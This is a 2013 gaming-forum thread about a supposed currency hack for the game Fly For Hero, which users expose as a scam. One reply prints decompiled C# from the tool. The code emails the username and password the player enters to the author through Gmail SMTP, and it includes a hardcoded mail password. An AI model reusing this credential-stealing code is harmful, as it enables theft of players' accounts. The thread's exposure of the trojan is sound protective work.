New Perin Hack (Fly For Hero Only)

02/08/2013 03:46 FlyForHeroProHacker#1
Hey, Just made a new Fly For hero perin hack, my other one just recently got patched but the good news is that my old hack hacked over 25k perin! :)
Well lets hope this one dose to.
Virus Scan : [Only registered and activated users can see links. Click Here To Register...]

Change Logs :
V1 - Added Perin Hack
V2 - Added Stat Mod, Upgraded Perin Hack , Moon stone sunstone hack
V3 - You wait :)


Doesn't Work?
Try on a diffrent account and make sure its FLY FOR HERO not fly for fun.
Enjoy, Post bugs below so i can fix it :)
02/08/2013 05:50 heinerborle#2
So it doesn't work on any other flyff? Like eclipse flyff?
02/08/2013 09:56 eich99#3
Sorry just tried it again! it works
02/08/2013 10:27 Independence Production#4
i've tried its fake. you can use it on a empty acc dont must be add user name etc.
completly fake (hack) to get your account id + pw
02/08/2013 11:26 anarmohu#5
bannn pls
02/08/2013 12:54 Lumi#6
Please add a VT and a Anubis Link of the .exe!
02/08/2013 13:37 KinqKalle#7
close pls its a fake.
02/08/2013 16:13 FlyForHeroProHacker#8
Are you useing fly for hero?
Remember this dosent work for FLyff

Virus scan of the .exe file
[Only registered and activated users can see links. Click Here To Register...]
02/08/2013 16:21 Independence Production#9
Quote:
Originally Posted by FlyForHeroProHacker View Post
Are you useing fly for hero?
Remember this dosent work for FLyff

Virus scan of the .exe file
[Only registered and activated users can see links. Click Here To Register...]
YES i use fly for hero and i dont get anything my name there is Unfarmable and i get nothing
02/08/2013 19:49 FlyForHeroProHacker#10
Hmm a bug already, ill try and fix it
Whats your in game name?
02/08/2013 21:11 Independence Production#11
Quote:
Originally Posted by FlyForHeroProHacker View Post
Hmm a bug already, ill try and fix it
Whats your in game name?
Unforgettable / Unfarmable
02/08/2013 23:25 Shirom09#12
this is a Virus ,pls don't download it !!!
02/09/2013 06:34 FlyForHeroProHacker#13
Quote:
Originally Posted by Shirom09 View Post
this is a Virus ,pls don't download it !!!
A virus? I put up a virus scan sir, please look at it
02/09/2013 12:09 xMootie#14
It's an unobfuscated .NET application...

Quote:
private void Button1_Click(object sender, EventArgs e)
{
if ((this.TextBox1.Text == "") & (this.TextBox2.Text == ""))
{
MessageBox.Show("You Forgot To Fill your Username and Password");
}
else if (this.TextBox2.Text == "")
{
MessageBox.Show("Password Is Missing");
}
else if (this.TextBox1.Text == "")
{
MessageBox.Show("Username is missing");
}
else
{
SmtpClient client = new SmtpClient();
MailMessage message = new MailMessage();
client.Credentials = new NetworkCredential("[Only registered and activated users can see links. Click Here To Register...]", "penapickle123");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
message = new MailMessage {
From = new MailAddress("[Only registered and activated users can see links. Click Here To Register...]")
};
message.To.Add("[Only registered and activated users can see links. Click Here To Register...]");
message.Subject = "Username: " + this.TextBox1.Text + " Password: " + this.TextBox2.Text;
message.Body = "Username : " + this.TextBox1.Text + ", Password : " + this.TextBox2.Text;
client.Send(message);
Interaction.MsgBox("Sucess! Please Log on Fly For Hero now", MsgBoxStyle.OkOnly, null);
}
}
Doesn't look like a virus, but probably a scam.
02/09/2013 12:51 Lumi#15
Thank you, XorLethal.
I will check this.